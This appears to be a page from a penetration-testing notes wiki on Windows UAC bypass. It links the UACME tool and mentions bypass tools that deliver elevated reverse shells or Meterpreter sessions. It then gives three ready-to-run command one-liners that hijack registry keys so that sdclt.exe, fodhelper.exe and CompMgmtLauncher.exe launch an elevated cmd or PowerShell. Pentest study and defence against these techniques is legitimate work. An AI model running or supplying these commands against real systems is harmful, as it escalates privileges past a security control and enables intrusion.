UAC Bypass

From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting

https://github.com/hfiref0x/UACME - x32 x64
TpmInitUACBypass Bypass User Account Control (UAC), to get a High Integrity (or SYSTEM) Reversed Command shell, a reversed PowerShell session, or a Reversed Meterpreter session.
TpmInitUACAnniversaryBypass Same as above, only works on Windows 10 x64 with the Anniversary Update applied (Version 1607).


UAC bypass for Win10 - control.exe

 reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f


UAC bypass for Win10 - fodhelper.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f


UAC bypass for 7/8/10 - CompMgmtLauncher.exe

reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f